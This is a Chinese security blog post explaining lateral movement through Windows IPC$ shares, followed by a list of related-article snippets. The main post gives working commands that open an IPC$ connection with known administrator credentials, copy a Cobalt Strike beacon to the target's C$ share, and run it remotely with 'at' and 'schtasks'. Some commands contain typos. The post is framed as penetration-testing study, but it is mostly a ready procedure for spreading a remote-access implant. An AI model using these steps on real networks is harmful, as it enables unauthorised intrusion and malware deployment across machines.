横向渗透之IPC横向

最新推荐文章于 2024-01-28 23:28:45 发布
最新推荐文章于 2024-01-28 23:28:45 发布
阅读量859 收藏 1
点赞数
分类专栏: 内网安全 文章标签: 安全 渗透测试 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46258964/article/details/124218513
版权

IPC横向
IPC(Internet Process Connection)共享命名管道的资源,
是为了实现进程间通信而开放的命名管道。
IPC可以通过验证用户名和密码获得相应的权限,使用139、445端口。

利用条件

1,目标主机开启了139和445端口
2,目标主机管理员开启了ipc$默认共享:
3,知道目标机的账号密码

建立IPC连接

建立IPC连接命令:
net use \\172.16.1.132\ipc$ "password" /user:"Administrator"	#工作组
net use \server\ipc$"password" /user:domain\username 			#域内

查看连接是否建立
net use

查看目标主机的文件
dir  \\172.16.1.132\c$

查看目标主机的共享
net view 172.16.1.132

断开连接:
net use \\172.16.1.132\ipc$ /del

上传木马,任务计划执行木马上线CS

上传木马
copy beacon.exe \\172.16.132\c$

创建计划任务(at<2012、schtasks>=2012):
at \\172.16.1.132 19:00 c:\beacon.exe

schtasks 在windows版本大于等于windows2012下使用
shctasks /create /s 192.168.xx.xx /run "system" /tn adduser /scDAILY /tr c:\1.bat /F #创建adduser任务对应批处理脚本
schtasks  /run /s 192.168.xx.xx /tn adduser /i #运行adduser任务
schtasks /delete /s 192.168.xx.xx /tn adduser /f #删除adduser任务

我尝试上线msf,但是不知道原因上线之后会断开连接,只能上传CS木马。

西湖第一剑
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透测试:内网横向移动基础总结
KH_FC的博客
12-29 5358
内网渗透测试:内网横向移动基础总结 横向移动 在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器。 在这篇文章中,我们来讲解一下横向移动的思路与攻击手法。 由于最近开学了有很多很多的事,所以一直没有时间更新,文章可能略显仓促,不足之处还请多多指教。 本文大多是我最近的学习总结,专为想我一样
内网横向方法总结
不曾扬帆,何以至远方
06-23 2117
内网横向渗透方法总结
内网之横向移动之IPC
shy的博客
11-11 1749
一,IPC IPC(Internet Process Connection)共享命名管道的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限。 二,ipc$与空连接,139,445端口,默认共享的关系 1,ipc$与空连接: 不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了. 许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口
基于IPC$的横向移动
yy
11-12 3349
IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 利用IPC$,连接者可以与目标主机建立一个连接,利用这个连接,连接者可以得到目标主机上的目录结构、用户列表等信息,还能运行其他其他命令。 IPC$的利用条件 开启了139、445端口。IP
内网安全IPC协议横向移动
最新发布
qq_61553520的博客
01-28 1421
本篇主要介绍内网横向移动的IPC协议利用方式,从命令,工具,脚本自动化多种方式讲解实战攻击思路
使用DCOM进行横向渗透1
08-03
使DCOM进横向渗透使 DCOM 进横向渗透* 引* DCOM 列表获取* DCOM 组件法获取* DCOM 本地执命令测试* DCOM 远程执命令测试* Im
WPF_ListView横向显示.zip
06-29
ListView横向显示,比用string去便利更方便,有需要的可以用一用,研究了很久才搞成的效果,可以继续优化,
WinFormTabContrl控件TabPageName横向显示.rar
05-22
WinFormTabContrl控件TabPageName横向显示.rar,代码结构清楚,本人亲测,功能强大
swiper横向循环焦点图片.rar
04-10
swiper横向循环焦点图片类似 swiper官网https://www.swiper.com.cn/demo/web/index.html这个页面的例子
CSS 图片横向排列实现代码
09-05
一个CSS布局实例,介绍的是一个横向排列的图片列表,这也是大家在从事网页布局时候最常见的一种布局实例,有必要掌握,本代码已经过了优化,个别细节你需根据你的网站主CSS风格进行调整,才能完美搭配。
[内网] 横向渗透的几种方式
weixin_43586169的博客
07-28 4423
详细介绍了,横向渗透的黄金IPC$ & PTT & PTH & PTK,以及黄金票据与白银票据的方式
Linux进程之间的8种通信方式
u010503912的专栏
04-05 803
1.无名管道( pipe )     管道是一种半双工的通信方式,数据只能单向流动,而且只能在具有亲缘关系的进程间使用。 进程的亲缘关系通常是指父子进程关系。 2.高级管道(popen)     将另一个程序当做一个新的进程在当前程序进程中启动,则它算是当前程序的子进程, 这种方式我们成为高级管道方式。 3.有名管道 (named pipe)     有名管道也是半双
内网渗透_IPC
qq_42383069的博客
04-07 5047
内网渗透_IPC 0x01. 什么是IPC IPC(共享命名管道资源)其实就是为了实现进程间通信而开放的命名管道;IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源使用 简单理解:可以访问目标机器上的文件(上传、下载),也可以在目标标机器上运行命令 上传和下载文件直接通过 copy 命令就可以,不过路径缓存 UNC 路径 什么是UNC路径?就是以 \ 开头的路径就是UNC路径,比如:\\10.10.10.10\c$\users 0x02. IPC的利用条件 开启了1
IPC$横向渗透代码实现
weixin_30662539的博客
02-16 487
思路 IPC$横向渗透的方法,也是病毒常用的扩散方法。 1、建立连接 2、复制文件到共享中C$、D$、E$、F$ 3、获取服务器的时间 3、设定计划任务按时间执行 用到的Windows API 建立网络驱动器 WNetAddConnection2() WNetAddConnection2W( _In_ LPNETRESOURCEW lpNetResource, ...
学习笔记-IPC$(Internet Process Connection)
人饭子的博客
11-05 1415
IPC$(Internet Process Connection) IPC$ 的概念 IPC$(Internet Process Connection) 是共享 "命名管道" 的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限, 在远程管理计算机和查看计算机的共享资源时使用。 利用 IPC$,连接者可以与目标主机建立一个连接,利用这个连接,连接者可以得到目标主...
IPC$渗透使用
qq_41272376的博客
02-19 715
IPC$渗透使用 简介 IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。 使用条件 1.开放了139、445端口; 2.目标开启ipc$文件共享; 3.获取用户账号密码。 测试过程 此测试前提是获取了ipc$, 这里测试的时候得到的权限是system,然后创建了一个admin账户,给...
内网渗透-横向移动($IPC&at&schtasks)
weixin_45032957的博客
05-17 543
什么是IPCIPC(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 #建立ipc常见错误代码 5:拒绝访问,可能需要提权 52:网络问题 53:端口未开放,未开机,防火墙拦截 67:本地lanmanworkstation服务未启动,目标删除了ipc$ 1219:提供的凭据和已存在的凭据集冲突,说明已经建立ipc$,需要先删除 1326:账号密码错
内网安全学习(二)---横向渗透
qi_SJQ_的博客
02-09 4005
横向批量 at&schtasks&impacket 权限提升的思路以在之前博客已介绍过,在后渗透中更推荐 :先信息收集 再提权 再进行内网渗透 的思路,此篇及之后着重学习内网渗透技术。 1.横向渗透—明文传递at&schtasks: 在拿下一台内网主机后,通过本地信息收集用户凭证等信息后,之后如何横向渗透拿下更多的主机? 这里仅介绍 at&schtasks 命令的使用,在已知目标系统的用户明文密码的基础上,直接可以在远程主 机上执行命令。 [at] & [sc
如何横向渗透windows
08-09
由于横向渗透是一种攻击技术,我作为AI助手,将不能提供有关如何进行横向渗透的具体指导。 然而,我可以向您提供一些常见的横向渗透攻击方式,以便您了解并采取相应的防范措施。这些攻击方式包括: 1. 弱密码攻击:攻击者可能会尝试使用弱密码或密码猜测来获取对其他用户账户的访问权限。为了防止此类攻击,您应该强制要求所有用户使用强密码,并定期更改密码。 2. 社交工程:攻击者通过伪装成其他人或组织的成员,欺骗用户提供敏感信息或执行恶意操作。要防范此类攻击,用户应该保持警惕,警惕不熟悉的链接和附件,并采取多因素身份验证措施。 3. 操作系统和应用程序漏洞利用:攻击者可能会利用操作系统或应用程序的漏洞,通过远程执行命令或提权来渗透目标系统。为了防范此类攻击,您应该定期更新系统和应用程序的补丁。 4. 内部渗透:攻击者可能会通过利用组织内部的弱点或隐私问题,获取对其他系统或网络的访问权限。为了防范此类攻击,您应该加强内部安全控制,包括访问控制和网络分段。 请记住,本回答旨在提供对横向渗透的一般了解,并强调重要的防范措施。如果您需要更详细的信息或技术指导,建议咨询专业的网络安全团队或咨询专家。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值